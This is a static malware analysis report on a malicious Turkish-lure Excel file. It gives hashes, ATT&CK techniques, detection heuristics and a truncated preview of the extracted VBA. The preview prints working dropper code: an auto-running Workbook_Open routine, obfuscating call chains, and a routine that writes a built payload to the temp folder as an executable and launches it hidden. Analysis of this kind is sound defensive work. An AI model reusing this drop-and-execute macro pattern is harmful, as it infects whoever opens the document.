Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 ad78b68616b80324…

MALICIOUS

Office (OLE)

71.5 KB Created: 2018-06-02 22:23:44 Authoring application: Microsoft Excel First seen: 2018-09-04
MD5: 62a9d489a1dd0b7138894ffcdf14d3b3 SHA-1: 73c56cf43eb8e37f13a65b95dc9f1fd29c3a2ed4 SHA-256: ad78b68616b803243d56593e0fdd6adeb07bfc43d0715710a2c14417bba90033
228 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment T1203 Exploitation for Client Execution

The sample is an Excel file containing VBA macros, specifically a Workbook_Open macro that calls the Shell() function. The document body contains a Turkish lure suggesting macros need to be enabled to view content. The VBA script is heavily obfuscated but the Workbook_Open execution and Shell() call indicate it is designed to download and execute a second-stage payload, consistent with known malware delivery techniques.

Heuristics 6

  • ClamAV: Xls.Malware.Valyria-10036514-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Xls.Malware.Valyria-10036514-0
  • VBA macros detected medium 4 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • Workbook_Open macro high OLE_VBA_WBOPEN
    Workbook_Open macro
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Environ() call (env variable access) low OLE_VBA_ENVIRON
    Environ() call (env variable access)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 15007 bytes
SHA-256: 0239e860f0e7af2d37e2ef14db0ceae745b3f25dbd0b964dd3694af3e2de6815
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "Git"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Gel"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Option Explicit
Static Sub woRKBOOK_Open(): Call UTlna: End Sub
Sub UTlna()
Call jJrRg
End Sub
Function jJrRg() As Date
Call LUFLP
End Function
Function LUFLP() As Variant
Call aKLoV
End Function
Static Sub aKLoV()
Call pARSa
End Sub
Static Sub pARSa()
Call RLfMK
End Sub
Static Function RLfMK() As Double
Call gBlqP
End Function
Sub gBlqP()
Call INzky
End Sub
Sub INzky()
Call XDFOE
End Sub
Function XDFOE() As Single
Call zOTIn
End Function
Private Sub zOTIn()
Call mOHFl
End Sub
Function mOHFl() As Long
Call PZVzU
End Function
Function PZVzU() As Date
Call dPbda
End Function
Sub dPbda()
Call GaqXJ
End Sub
Sub GaqXJ()
Call UQvAP
End Sub
Function UQvAP()
Call xcKuy
End Function
Sub xcKuy()
Call MSPYE
End Sub
Sub MSPYE()
Call odeSn
End Sub
Private Function odeSn() As Currency
Call DTjws
End Function
Private Sub DTjws()
Call RJpay
End Sub
Private Sub RJpay()
Call ZrFOF
End Sub
Static Sub ZrFOF()
Call nhKrK
End Sub
Static Sub nhKrK()
Call QtZlt
End Sub
Static Function QtZlt() As Byte
Call ejePz
End Function
Private Function ejePz()
Call HutJi
End Function
Private Sub HutJi()
Call Wkyno
End Sub
Private Sub Wkyno()
Call yvNhX
End Sub
Private Function yvNhX() As Long
Call NlSLd
End Function
Private Function NlSLd() As Date
Call pxhFM
End Function
Static Sub pxhFM()
Call EnniS
End Sub
Static Function EnniS() As Date
Call FIjwt
End Function
Static Sub FIjwt()
Call Typaz
End Sub
Static Function Typaz() As String
Call wJDUi
End Function
Static Function wJDUi() As Boolean
Call KzJxo
End Function
Static Sub KzJxo()
Call nKXrX
End Sub
Static Sub nKXrX()
Call CAdVc
End Sub
Static Function CAdVc() As Object
Call Qqizi
End Function
Static Function Qqizi() As Long
Call tCxtR
End Function
Static Sub tCxtR()
Call HsDXX
End Sub
Function HsDXX() As Long
Call kDRRG
End Function
Private Function kDRRG() As Single
Call dQYoj
End Function
Private Function dQYoj() As String
Call GbniS
End Function
Private Sub GbniS()
Call URsMY
End Sub
Private Sub URsMY()
Call xcHGH
End Sub
Function xcHGH() As Currency
Call LSMkN
End Function
Function LSMkN() As Object
Call oebew
End Function
Sub oebew()
Call DUgIB
End Sub
Sub DUgIB()
Call ffvCl
End Sub
Function ffvCl() As Variant
Call uVAfq
End Function
Sub uVAfq()
Call vqxtS
End Sub
Static Function vqxtS() As Single
Call JgDWX
End Function
Private Sub JgDWX()
Call YWIAd
End Sub
Private Sub YWIAd()
Call AhXuM
End Sub
Private Function AhXuM() As Integer
Call PYcYS
End Function
Private Function PYcYS() As Currency
Call rjrSB
End Function
Private Sub rjrSB()
Call GZwwH
End Sub
Private Sub GZwwH()
Call gzxsv(VBA.Environ("TMP") & "\KUjjm.exe", ikZeU): Call Shell(VBA.Environ("TMP") & "\KUjjm.exe", vbHide)
End Sub
Private Function ikZeU()
ikZeU = pseEM
Call bLOwy(ikZeU, oWAPU)
Call bLOwy(ikZeU, kZHFk)
Call bLOwy(ikZeU, DQLiR)
Call bLOwy(ikZeU, vVWLE)
Call bLOwy(ikZeU, QTgPC)
Call bLOwy(ikZeU, SsThc)
Call bLOwy(ikZeU, asIVi)
Call bLOwy(ikZeU, YMfzD)
Call bLOwy(ikZeU, igXZj)
Call bLOwy(ikZeU, kzkrj)
Call bLOwy(ikZeU, VnAZm)
Call bLOwy(ikZeU, yfSYg)
Call bLOwy(ikZeU, XFgQW)
Call bLOwy(ikZeU, Ezdut)
Call bLOwy(ikZeU, CGMFO)
Call bLOwy(ikZeU, zhAWU)
Call bLOwy(ikZeU, ayDAW)
Call bLOwy(ikZeU, mOGJW)
Call bLOwy(ikZeU, CVrLZ)
Call bLOwy(ikZeU, WMkHG)
Call bLOwy(ikZeU, APAno)
Call bLOwy(ikZeU, rwfpl)
Call bLOwy(ikZeU, IAZFd)
Call bLOwy(ikZeU, FaUrv)
Call bLO
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.